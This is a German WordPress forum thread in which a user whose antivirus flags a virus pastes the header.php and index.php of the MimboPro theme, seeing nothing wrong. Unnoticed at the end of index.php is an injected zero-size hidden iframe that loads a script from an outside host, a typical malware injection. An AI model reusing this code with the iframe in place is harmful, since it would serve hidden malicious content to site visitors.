| | #1 (permalink) |
| PostRank: 1 ![]() Registriert seit: 06.02.2008
Beiträge: 33
| html/crypted.gen Hallo, ich scheine den Virus html/crypted.gen zu haben Laut Anleitung soll er ja in der header.php des themes sein. Bei mir MimboPro. In der header finde ich alelrdings nichts: Code: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" <?php language_attributes(); ?>>
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php
//Smart and SEO-friendly titles!
if ( is_single() ) {
wp_title('');
echo (' | ');
bloginfo('name');
} else if ( is_page() || is_paged() ) {
bloginfo('name');
wp_title('|');
} else if ( is_author() ) {
bloginfo('name');
wp_title(' | Archive for ');
} else if ( is_archive() ) {
bloginfo('name');
echo (' | Archive for ');
wp_title('');
} else if ( is_search() ) {
bloginfo('name');
echo (' | Search Results');
} else if ( is_404() ) {
bloginfo('name');
echo (' | 404 Error (Page Not Found)');
} else if ( is_home() ) {
bloginfo('name');
} else {
bloginfo('name');
echo (' | ');
echo (''.$blog_longd.'');
}
?></title>
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
<?php if ( is_single() ) { ?>
<meta name="description" content="<?php wp_title(''); ?>" />
<meta name="keywords" content="<?php wp_title(''); ?>" />
<?php } ?>
<?php if ( ! is_single() ) { ?>
<meta name="description" content="<?php bloginfo('description'); ?>" />
<meta name="keywords" content="<?php bloginfo('description'); ?>" />
<?php } ?>
<link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/style.css" type="text/css" media="screen" title="default" />
<?php
//Include homepage-specific files
if (is_home()) { ?>
<link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/css/home.css" type="text/css" media="screen" />
<?php } ?>
<link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/css/nav.css" type="text/css" media="screen" title="default" />
<link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/css/tabs.css" type="text/css" media="screen" title="default"/>
<link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/css/carousel.css" type="text/css" media="screen" title="default"/>
<link rel="alternate stylesheet" href="<?php bloginfo('template_url'); ?>/css/print-preview.css" type="text/css" media="screen" title="Print Preview"/>
<?php $bmValue = get_settings( "bm_style" );
if( $bmValue != "" ) { ?>
<link href="<?php bloginfo('template_url'); ?>/skins/<?php echo $bmValue; ?>/styles.css" type="text/css" rel="stylesheet" title="default" />
<?php } ?>
<link rel="stylesheet" href="<?php bloginfo('template_url'); ?>/css/print.css" type="text/css" media="print" />
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/dropdowns.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/printPreview.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/commenteditor.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/domtab.js"></script>
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<link rel="shortcut icon" href="<?php bloginfo('template_url'); ?>/images/favicon.ico" />
<?php if( get_option( "bm_logo" ) == 1 ) { ?>
<style type="text/css">
#masthead h1, a#logo {
text-indent:-9999px;
width:320px;
height:108px;
background:url( <?php bloginfo('template_url'); ?>/images/logo.gif ) no-repeat;
margin:0 auto;
display:block;
color:#FFF;
}
#masthead h2 {
display:none;
}
</style>
<?php }
if( get_option( "bm_useCustomHeader" ) == 1 ) {
$newHeader = get_header_image();
if( $newHeader != "" ) { ?>
<style type="text/css">
#masthead {
background-image: url(<?php echo $newHeader; ?>);
}
</style>
<?php
}
}
?>
<?php wp_head(); ?>
<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/js/jquery.jcarousel.pack.js"></script>
<script type="text/javascript">
jQuery(document).ready(function() {
jQuery('#mycarousel').jcarousel();
});
</script>
</head>
<body<?php if (is_home()) { ?> id="home"<?php } else { ?> class="page-<?php echo $post->post_name; ?>" id="interior"<?php } ?>>
<div id="printMessage"></div>
<div id="page">
<div id="masthead">
<?php if (is_home()) { ?>
<h1></h1>
<?php } else { ?>
<a id="logo" href="<?php bloginfo('home'); ?>" title="Back Home"></a>
<?php } ?>
<h2 id="description"></h2>
</div>
<div id="navbar" class="clearfloat">
<ul id="nav" class="left clearfloat">
<li <?php if (is_home()) { ?>class="current-cat"<?php } ?>><a href="<?php echo get_option('home'); ?>/">Home</a></li>
<?php
$bm_navigation = get_settings( "bm_navigation" );
if( $bm_navigation == "" || $bm_navigation == 0 ) {
wp_list_categories('title_li=');
} else {
wp_list_pages('title_li=');
}
?>
</ul>
<?php include (TEMPLATEPATH . '/searchform.php'); ?>
</div><!--END NAVBAR-->
__________________ http://aroundtheworld.dehein.de |
| | |
| | #2 (permalink) |
| PostRank: 1 ![]() Registriert seit: 06.02.2008
Beiträge: 33
| Jedoch meldet AntiVir den gleichen Virus wenn ich die index.php übertrage, aber dort finde ich nichts: Code: <?php get_header(); ?>
<div id="upper" class="clearfloat">
<div id="lead" class="clearfloat">
<div class="left">
<?php
//Interacts with control panel to determine lead category
$bm_categories = get_categories('hide_empty=0');
$mim_feature = get_settings( "mim_feature" );
if( $mim_feature == 0 ) { $mim_feature = $bm_categories[ 0 ]->cat_ID; }
query_posts( 'showposts=1&cat=' . $mim_feature );
while (have_posts()) : the_post();
?>
<?php
$values = get_post_custom_values("Image");
if (isset($values[0])) {
?>
<a href="<?php the_permalink() ?>" rel="bookmark"><img src="<?php echo bloginfo('template_url'); ?>/scripts/timthumb.php?src=/<?php
$values = get_post_custom_values("Image"); echo $values[0]; ?>&w=200&h=210&zc=1" alt="<?php the_title(); ?>" /></a>
<?php } ?>
</div>
<div class="right">
<h3><a href="<?php the_permalink() ?>" rel="bookmark"><?php the_title(); ?></a>
<span class="commentcount">(<?php comments_popup_link('0', '1', '%'); ?>)</span></h3>
<div class="date"><?php the_date(); ?> • Category: <?php the_category(', ') ?></div>
<div class="bigger"><?php the_excerpt(); ?></div>
<a href="<?php the_permalink() ?>" rel="bookmark" id="fullstory"><?php the_title(); ?></a>
<?php endwhile; ?>
</div>
</div><!--END LEAD-->
<div id="recent">
<h3>Aktuelle <span>Berichte</span></h3>
<ul>
<?php query_posts('showposts=5'); ?>
<?php while (have_posts()) : the_post(); ?>
<li><a href="<?php the_permalink() ?>" rel="bookmark"><?php the_title(); ?></a></li>
<?php endwhile; ?>
</ul>
</div>
</div><!--END UPPER-->
<?php
// Interacts with control panel to determine carousel category
$bm_carousel = get_settings( "mim_carousel" );
$bm_carouselCount = get_settings( "bm_carouselCount" );
if( $bm_carouselCount == "" ) { $bm_carouselCount = 12; }
if( $bm_carousel > 0 ) {
?>
<div id="carousel">
<ul id="mycarousel" class="jcarousel-skin-tango">
<?php
query_posts('showposts=' . $bm_carouselCount . '&cat=' . $bm_carousel );
while (have_posts()) {
the_post();
?>
<li>
<a href="<?php the_permalink() ?>" rel="bookmark"><img src="<?php bloginfo('template_url'); ?>/scripts/timthumb.php?src=/<?php $values = get_post_custom_values("Image"); echo $values[0]; ?>&w=155&h=82&zc=1" alt="<?php the_title(); ?>" /><?php the_title(); ?></a>
</li>
<?php } ?>
</ul>
</div>
<?php } ?>
<div class="stripes clearfloat">
<?php get_sidebar(); ?>
<div id="content">
<?php
// Determines which categories will display in middle column
$bm_boxColor[] = "green";
$bm_boxColor[] = "red";
$bm_boxColor[] = "grey";
$bm_currentColor = -1;
/*$postcat = get_settings( "mim_homeCat" );
if( ! is_array( $postcat ) ) {
foreach ( $bm_categories as $b ) {
$postcat[] = $b->cat_ID;
}
}*/
$postcat = array( "7", "6", "10" );
$bm_baseURL = get_bloginfo('url');
forEach( $postcat as $bm_pC ) {
$bm_currentColor ++;
if( $bm_currentColor >= count( $bm_boxColor ) ) { $bm_currentColor = 0; }
$catDetails = bm_catProperties( $bm_pC );
//Choose how many total headlines you want in each category box
query_posts('showposts=4&cat=' . $bm_pC ); ?>
<div class="whitebox catnews">
<h3 class="<?php echo $bm_boxColor[ $bm_currentColor ]; ?>"><a href="<?php echo get_category_link( $catDetails->cat_ID ); ?>"><?php echo $catDetails->cat_name ?>»</a></h3>
<?php
$count = 0;
while (have_posts()) {
the_post();
if( $count <5 ) { ?>
<div class="clearfloat">
<h4><a href="<?php the_permalink() ?>" rel="bookmark"><?php the_title(); ?></a>
<span class="commentcount">(<?php comments_popup_link('0', '1', '%'); ?>)</span></h4>
<?php $values = get_post_custom_values("Image");
if (isset($values[0])) {
?>
<a href="<?php the_permalink() ?>" rel="bookmark"><img src="<?php echo bloginfo('template_url'); ?>/scripts/timthumb.php?src=/<?php
$values = get_post_custom_values("Image"); echo $values[0]; ?>&w=70&h=70&zc=1" alt="<?php the_title(); ?>" /></a>
<?php } ?>
<?php the_excerpt(); ?>
<ul class="headlines">
<?php
} else {
?>
<li><a href="<?php the_permalink() ?>" rel="bookmark"><?php the_title(); ?></a> </li>
<?php
}
?>
</div>
<?php
$count ++;
}
if( $count > 0 ) { echo "</ul>"; }
?>
</div>
<?php } ?>
</div><!--END CONTENT-->
<?php include("ads.php"); ?>
</div><!--END STRIPES-->
<?php get_footer(); ?>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Danke
__________________ http://aroundtheworld.dehein.de |
| | |
![]() |
| Lesezeichen |
| Themen-Optionen | |
| Ansicht | |
| |